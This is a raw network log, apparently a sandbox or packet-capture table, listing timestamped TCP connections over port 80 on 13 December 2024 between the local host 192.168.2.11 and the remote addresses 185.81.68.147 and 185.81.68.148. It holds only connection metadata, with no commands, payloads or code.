                                                                                                                                                                                                Dec 13, 2024 08:20:19.887623072 CET4999280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:19.901074886 CET8049984185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:20.007503986 CET8049992185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:20.007606030 CET4999280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:20.010216951 CET4999280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:20.080003977 CET8049987185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:20.080079079 CET4998780192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:20.082040071 CET8049988185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:20.082088947 CET4998880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:20.129964113 CET8049992185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:20.130034924 CET4999280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:20.249947071 CET8049992185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:21.422266006 CET8049968185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:21.422394991 CET4996880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:21.455694914 CET8049992185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:21.455800056 CET8049992185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:21.455873966 CET4999280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:21.457168102 CET4999280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:21.559211969 CET4999680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:21.576899052 CET8049992185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:21.661890984 CET4998780192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:21.662384987 CET4999880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:21.672391891 CET4998880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:21.672857046 CET4999980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:21.680218935 CET8049996185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:21.680299997 CET4999680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:21.680393934 CET4999680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:21.735831976 CET8049969185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:21.735891104 CET4996980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:21.782335997 CET8049987185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:21.782401085 CET4998780192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:21.782928944 CET8049998185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:21.783005953 CET4999880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:21.792642117 CET8049988185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:21.792673111 CET8049999185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:21.792705059 CET4998880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:21.792758942 CET4999980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:21.800076962 CET8049996185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:21.800165892 CET4999680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:21.807707071 CET4999880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:21.807735920 CET4999980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:21.919956923 CET8049996185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:21.927608013 CET8049998185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:21.927659035 CET8049999185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:22.126102924 CET8049972185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:22.126174927 CET4997280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:22.376020908 CET8049973185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:22.376096964 CET4997380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:23.121488094 CET8049998185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:23.121550083 CET4999880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:23.159133911 CET8049999185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:23.159230947 CET4999980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:23.306274891 CET8049996185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:23.306364059 CET8049996185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:23.306466103 CET4999680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:23.307756901 CET4999680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:23.418658018 CET5000380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:23.427413940 CET8049996185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:23.469129086 CET8049978185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:23.470861912 CET4997880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:23.516918898 CET8049977185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:23.517050028 CET4997780192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:23.538408995 CET8050003185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:23.538558006 CET5000380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:23.538635015 CET5000380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:23.641684055 CET8049982185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:23.641736984 CET4998280192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:23.658292055 CET8050003185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:23.658400059 CET5000380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:23.778315067 CET8050003185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:23.859697104 CET8049983185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:23.859877110 CET4998380192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:24.847496986 CET4999880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:24.847821951 CET5000680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:24.852315903 CET4999980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:24.852611065 CET5000780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:24.967762947 CET8050006185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:24.967901945 CET5000680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:24.968029976 CET8049998185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:24.968089104 CET4999880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:24.972354889 CET8050007185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:24.972460985 CET5000780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:24.972681999 CET8049999185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:24.972738028 CET4999980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:24.992815971 CET5000680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:24.992924929 CET5000780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:25.112582922 CET8050006185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:25.112642050 CET8050007185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:25.134423018 CET8050003185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:25.134495974 CET8050003185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:25.134630919 CET5000380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:25.135842085 CET5000380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:25.246850014 CET5001080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:25.255737066 CET8050003185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:25.366708040 CET8050010185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:25.366846085 CET5001080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:25.366919994 CET5001080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:25.486797094 CET8050010185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:25.486934900 CET5001080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:25.606753111 CET8050010185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:26.302354097 CET8050006185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:26.302501917 CET5000680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:26.314382076 CET8050007185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:26.314450026 CET5000780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:26.961940050 CET8050010185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:26.961981058 CET8050010185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:26.962133884 CET5001080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:26.977448940 CET5001080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:27.091379881 CET5001380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:27.097419024 CET8050010185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:27.211245060 CET8050013185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:27.211368084 CET5001380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:27.212013960 CET5001380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:27.332839966 CET8050013185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:27.332889080 CET5001380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:27.452883959 CET8050013185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:27.896625042 CET5000680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:27.897042990 CET5001780192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:27.897258043 CET5000780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:27.897497892 CET5001880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:28.016882896 CET8050017185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:28.016907930 CET8050006185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:28.016958952 CET5001780192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:28.016993999 CET5000680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:28.017174959 CET8050018185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:28.017294884 CET8050007185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:28.017347097 CET5000780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:28.020783901 CET5001880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:28.102502108 CET5001780192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:28.102727890 CET5001880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:28.222232103 CET8050017185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:28.222378969 CET8050018185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:28.816076994 CET8050013185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:28.816116095 CET8050013185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:28.816173077 CET5001380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:28.817786932 CET5001380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:28.918754101 CET5002080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:28.937539101 CET8050013185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:29.038667917 CET8050020185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:29.038753986 CET5002080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:29.038815022 CET5002080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:29.159163952 CET8050020185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:29.159308910 CET5002080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:29.279179096 CET8050020185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:29.361918926 CET8050017185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:29.362118959 CET5001780192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:29.379689932 CET8050018185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:29.379759073 CET5001880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:30.632433891 CET8050020185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:30.632613897 CET8050020185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:30.632697105 CET5002080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:30.633991957 CET5002080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:30.746969938 CET5002580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:30.753709078 CET8050020185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:30.867134094 CET8050025185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:30.867222071 CET5002580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:30.867296934 CET5002580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:30.987150908 CET8050025185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:30.987366915 CET5002580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:31.100404978 CET5001780192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:31.100811958 CET5002680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:31.107290983 CET8050025185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:31.220782995 CET8050026185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:31.220880032 CET8050017185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:31.220909119 CET5002680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:31.220935106 CET5001780192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:31.223718882 CET5001880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:31.224004984 CET5002880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:31.224272013 CET5002680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:31.344182014 CET8050028185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:31.344209909 CET8050026185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:31.344342947 CET5002880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:31.344342947 CET8050018185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:31.344404936 CET5001880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:31.354989052 CET5002880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:31.475043058 CET8050028185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:32.304833889 CET8050025185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:32.304893970 CET8050025185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:32.305335999 CET5002580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:32.306229115 CET5002580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:32.418700933 CET5003080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:32.425915956 CET8050025185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:32.538393021 CET8050030185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:32.538525105 CET5003080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:32.538599968 CET5003080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:32.564805984 CET8050026185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:32.564927101 CET5002680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:32.658313036 CET8050030185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:32.658493042 CET5003080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:32.688888073 CET8050028185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:32.688945055 CET5002880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:32.778237104 CET8050030185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:34.150299072 CET8050030185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:34.150362015 CET8050030185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:34.150880098 CET5003080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:34.151840925 CET5003080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:34.262813091 CET5003580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:34.271589041 CET8050030185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:34.322525024 CET5002680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:34.322818995 CET5003680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:34.382539034 CET8050035185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:34.382636070 CET5003580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:34.382735014 CET5003580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:34.442562103 CET8050036185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:34.442634106 CET8050026185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:34.442696095 CET5003680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:34.442718029 CET5002680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:34.449744940 CET5003680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:34.450125933 CET5002880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:34.450202942 CET5003780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:34.502444983 CET8050035185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:34.502512932 CET5003580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:34.569578886 CET8050036185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:34.569895983 CET8050037185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:34.569976091 CET5003780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:34.570096016 CET8050028185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:34.570139885 CET5002880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:34.573340893 CET5003780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:34.622278929 CET8050035185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:34.693074942 CET8050037185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:35.799340010 CET8050036185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:35.799427032 CET5003680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:35.928637028 CET8050037185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:35.928769112 CET5003780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:35.995721102 CET8050035185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:35.995798111 CET8050035185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:35.995922089 CET5003580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:35.999026060 CET5003580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:36.106484890 CET5004280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:36.118807077 CET8050035185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:36.226433039 CET8050042185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:36.226509094 CET5004280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:36.226598024 CET5004280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:36.346384048 CET8050042185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:36.346434116 CET5004280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:36.466237068 CET8050042185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:37.667924881 CET8050042185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:37.668054104 CET8050042185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:37.668143988 CET5004280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:37.669537067 CET5004280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:37.683105946 CET5003680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:37.683454037 CET5004580192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:37.778127909 CET5004780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:37.789235115 CET8050042185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:37.790472984 CET5003780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:37.790756941 CET5004880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:37.803272963 CET8050045185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:37.803344965 CET5004580192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:37.803380966 CET8050036185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:37.803608894 CET5003680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:37.811259985 CET5004580192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:37.897875071 CET8050047185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:37.897970915 CET5004780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:37.898025990 CET5004780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:37.910423040 CET8050048185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:37.910501003 CET5004880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:37.910634041 CET8050037185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:37.910778999 CET5003780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:37.922828913 CET5004880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:37.931032896 CET8050045185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:38.017821074 CET8050047185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:38.017971039 CET5004780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:38.042571068 CET8050048185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:38.137900114 CET8050047185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:39.143651009 CET8050045185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:39.143714905 CET5004580192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:39.254393101 CET8050048185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:39.254466057 CET5004880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:39.535553932 CET8050047185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:39.535573006 CET8050047185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:39.535675049 CET5004780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:39.536990881 CET5004780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:39.653204918 CET5005380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:39.656795979 CET8050047185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:39.773204088 CET8050053185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:39.773292065 CET5005380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:39.773395061 CET5005380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:39.893205881 CET8050053185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:39.893276930 CET5005380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:40.013060093 CET8050053185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:40.684719086 CET5004580192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:40.684885979 CET5005680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:40.804748058 CET8050056185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:40.804833889 CET5005680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:40.804974079 CET8050045185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:40.805037022 CET5004580192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:40.805394888 CET5005680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:40.846985102 CET5004880192.168.2.11185.81.68.147
